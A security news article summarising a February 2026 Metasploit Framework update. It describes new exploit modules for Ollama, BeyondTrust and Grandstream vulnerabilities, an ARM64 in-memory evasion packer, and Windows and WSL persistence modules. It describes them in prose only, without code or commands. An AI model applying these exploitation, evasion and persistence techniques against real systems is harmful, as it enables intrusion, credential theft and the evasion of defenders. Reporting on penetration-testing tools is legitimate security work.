Metasploit’s Latest Update: New Exploits and Evasion Techniques Targeting Linux and BeyondTrust
On February 27, 2026, the Metasploit Framework unveiled a significant update, introducing seven new modules, nine feature enhancements, and critical bug fixes. This release empowers security professionals and penetration testers with advanced tools to address high-severity vulnerabilities across various platforms.
Critical Remote Code Execution Exploits
The update delivers potent exploit chains targeting critical vulnerabilities in enterprise and artificial intelligence infrastructures:
– Ollama Model Registry Path Traversal (CVE-2024-37032): With a CVSS score of 8.8, this vulnerability allows attackers to exploit Ollama’s pull mechanism using path traversal sequences. The module loads a rogue OCI registry to write malicious shared object files into the target. By forcing Ollama to spawn a new process, the malicious library is loaded, resulting in unauthenticated root remote code execution (RCE).
– BeyondTrust PRA and RS Command Injection (CVE-2026-1731): This critical flaw, carrying a CVSS score of 9.9, enables unauthenticated command injection in BeyondTrust Privileged Remote Access and Remote Support appliances. The update also introduces a new BeyondTrust helper library to streamline future module development.
– Grandstream GXP1600 Stack Overflow (CVE-2026-2329): Targeting VoIP devices, this vulnerability has a CVSS score of 9.3 and grants attackers a root session. The release includes one exploit module and two post-exploitation modules that leverage this access to steal credentials and proxy SIP traffic for packet capture.
Module Overview
| Module Name | CVE ID | Target | Module Type |
|——————————-|——————|——————–|———————-|
| Ollama Path Traversal RCE | CVE-2024-37032 | Linux / AI | Exploit |
| BeyondTrust PRA/RS RCE | CVE-2026-1731 | Appliances | Exploit |
| Grandstream GXP1600 RCE | CVE-2026-2329 | VoIP Devices | Exploit & Post |
| Linux RC4 Packer | N/A | ARM64 Linux | Evasion |
| WSL Startup Persistence | N/A | Windows / WSL | Exploit |
| Windows Active Setup | N/A | Windows | Exploit |
Advanced Evasion and Persistence Techniques
A major highlight of this release is the introduction of the first Linux evasion module for ARM64 architectures. The Linux RC4 Packer utilizes RC4 encryption, executes ELF binaries directly in memory, and employs sleep evasion to bypass detection mechanisms.
Additionally, new persistence modules have been added for Windows and the Windows Subsystem for Linux (WSL):
– WSL Startup Persistence: This module writes payloads to the user’s startup folder, ensuring execution upon system startup.
– Windows Registry Active Setup: This module launches payloads using native OS features. However, it downgrades permissions to user level and executes only once per user profile.
Key Enhancements and Fixes
The update also brings significant improvements to existing modules:
– Unreal IRCd and vsftpd Backdoor Modules: Enhanced with better check methods, native Meterpreter payloads, and verbose troubleshooting output.
– SolarWinds Exploit: Improved to automatically select the correct SRVHOST value.
– MS17-010 Scanner: Added a check method for better automation metadata.
Furthermore, the execution file has been split to provide a more granular approach to handling different platforms and architectures. Bug fixes were applied to the LDAP ESC and GraphQL Introspection scanners, eliminating crashes and false positives.
